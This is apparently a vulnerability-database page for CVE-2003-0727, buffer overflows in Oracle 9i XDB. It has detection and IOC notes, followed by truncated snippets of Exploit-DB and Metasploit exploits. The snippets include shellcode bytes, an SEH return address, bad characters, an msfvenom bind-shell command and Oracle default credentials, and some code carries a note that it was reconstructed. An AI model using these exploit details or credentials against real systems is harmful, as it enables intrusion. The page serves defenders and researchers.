CVE-2003-0727
Published: 2003-10-20
Priority: P4 (25) · CVSS 2.0 score: 2.1 (low) · Vector: AV:L/AC:L/Au:N/C:N/I:N/A:P
Exploit: available
EPSS: 68.55% (99.2th percentile)
Multiple buffer overflows in the XML Database (XDB) functionality for Oracle 9i Database Release 2 allow local users to cause a denial of service or hijack user sessions.
Detection & IOCs (extracted from sources)
- Detect oversized FTP UNLOCK command on port 2100 targeting Oracle XDB; the exploit sends a buffer of ~1130 bytes to the UNLOCK command with an SEH overwrite at offset 322.
- Detect an HTTP Basic Authorization header with an anomalously long base64-encoded credential sent to the Oracle XDB HTTP service (port 8080); the exploit embeds shellcode in the Authorization: Basic field.
- Detect an HTTP GET request with an oversized Authorization: Basic header to the Oracle XDB HTTP port; the exploit payload includes a \xeb\x64 short jump and a NOP sled pattern before the shellcode.
- Check the Oracle XDB FTP banner for the version string '9.2.0.1.0' to identify vulnerable instances.
- Oracle XDB default credentials used by exploits for authentication prior to the overflow: dbsnmp:dbsnmp, scott:tiger, system:manager, sys:change_on_install.
- The FTP exploit authenticates with default credentials (DBSNMP/DBSNMP) before sending the UNLOCK overflow; monitor FTP login attempts with these credentials on port 2100.
- The exploit uses an oraclient9.dll pop/pop/ret gadget at 0x60616d46 as the SEH handler overwrite target; presence of this return address in network traffic or memory indicates an exploitation attempt.
- The FTP exploit targets Oracle 9.2.0.1 Universal only; the Metasploit module has a single target and will not work against other patch levels without modification.
- The HTTP PASS exploit targets Windows x86 only (win32, winnt, win2000, winxp, win2003); the stack adjustment prepend (\x81\xc4\xff\xef\xff\xff\x44) is platform-specific.
- Payload bad characters for the FTP UNLOCK exploit are \x00\x20\x0a\x0d; shellcode must avoid these bytes.
- The HTTP PASS exploit requires a stack adjustment prepended to the shellcode before encoding.
No detection rules found.
Exploit-DB · 2017-09-25
Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow
---
#Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow
#Date: 09/25/2017
#Exploit Author: Charles Dardaman
#Twitter: https://twitter.com/CharlesDardaman
#Website: http://www.dardaman.com
#Version:9.2.0.1
#Tested on: Windows 2000 SP4
#CVE: 2003-0727
#This is a modified stand alone exploit of https://www.exploit-db.com/exploits/16809/
#!/usr/bin/python
import socket, sys, base64
#usage ./oracle9i_xbd_pass
rhost = sys.argv[1] #target ip
rport = int(sys.argv[2]) #target port
#Variables:
ret = "\x46\x6d\x61\x60" #0x60616d46 Little endian form
nop = "\x90"
pre = "\x81\xc4\xff\xef\xff\xff\x44" #This has to be prepended into the shellcode.
#msfvenom -p windows/shell_bind_tcp lport=9989 exitfunc=thread -f py -b "\x00" -e x86/shikata_ga_
Exploit-DB · 2010-10-05
Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)
---
##
# $Id: oracle9i_xdb_ftp_unlock.rb 10559 2010-10-05 23:41:17Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Class header and initialize() skeleton restored here; the original text between
# "class Metasploit3" and the module name was lost in extraction.
class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle 9i XDB FTP UNLOCK Overflow (win32)',
      'Description'    => %q{
By passing an overly long token to the UNLOCK command, a
stack based buffer overflow occurs. David Litchfield, has
illustrated multiple vulnerabilities in the Oracle 9i XML
Database (XDB), during a seminar on "Variations in exploit
methods between Linux and Windows" presented at the Blackhat
c
Exploit-DB · 2010-09-20
Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit)
---
##
# $Id: oracle9i_xdb_pass.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Class header and initialize() skeleton restored here; the original text between
# "class Metasploit3" and the module name was lost in extraction.
class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
      'Description'    => %q{
This module exploits a stack buffer overflow in the authorization
code of the Oracle 9i HTTP XDB service. David Litchfield,
has illustrated multiple vulnerabilities in the Oracle
9i XML Database (XDB), during a seminar on "Variations
in exploit methods between Linux and Windows" presented
at the Black
Exploit-DB · 2010-04-30
Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)
---
##
# $Id: oracle9i_xdb_ftp_pass.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Class header and initialize() skeleton restored here; the original text between
# "class Metasploit3" and the module name was lost in extraction.
class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle 9i XDB FTP PASS Overflow (win32)',
      'Description'    => %q{
By passing an overly long string to the PASS command, a
stack based buffer overflow occurs. David Litchfield, has
illustrated multiple vulnerabilities in the Oracle 9i XML
Database (XDB), during a seminar on "Variations in exploit
methods between Linux and Windows" presented at the Blackhat
conferenc
Exploit-DB · 2005-12-08
Oracle 9.2.0.1 - Universal XDB HTTP Pass Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::oracle9i_xdb_http;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'y0 [at] w00t-shell.net', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
'Priv' => 0,
'UserOpts' =>
Exploit-DB · 2003-08-13
Oracle XDB FTP Service - UNLOCK Buffer Overflow
---
/* Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit */
/* David Litchfield from ngssoftware (at Blackhat 2003)*/
/* */
/* Original Advisory : */
/* http://www.blackhat.com/presentations/bh-usa-03/bh- */
/* us-03-litchfield-paper.pdf */
#include
#include
#include
int GainControlOfOracle(char *, char *);
int StartWinsock(void);
int SetUpExploit(char *,int);
struct sockaddr_in s_sa;
struct hostent *he;
unsigned int addr;
char host[260]="";
unsigned char exploit[508]=
"\x55\x8B\xEC\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF\xFF\xFF\xBE\xFF\xFF"
"\xFF\xFF\x81\xF6\xDC\xFE\xFF\xFF\x03\xDE\x33\xC0\x50\x50\x50\x50"
"\x50\x50\x50\x50\x50\x50\xFF\xD3\x50\x68\x61\x72\x79\x41\x68\x4C"
"\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\xFF\x75\xFC\xFF\x55\xF4\x89"
Metasploit · Oracle 9i XDB FTP UNLOCK Overflow (win32)
By passing an overly long token to the UNLOCK command, a stack based buffer overflow occurs. David Litchfield has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference. Oracle9i includes a number of default accounts, including dbsnmp:dbsnmp, scott:tiger, system:manager, and sys:change_on_install.
Metasploit · Oracle 9i XDB FTP PASS Overflow (win32)
By passing an overly long string to the PASS command, a stack based buffer overflow occurs. David Litchfield has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference.
Metasploit · Oracle 9i XDB HTTP PASS Overflow (win32)
This module exploits a stack buffer overflow in the authorization code of the Oracle 9i HTTP XDB service. David Litchfield has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference.
No writeups or analysis indexed.
Published: 2003-10-20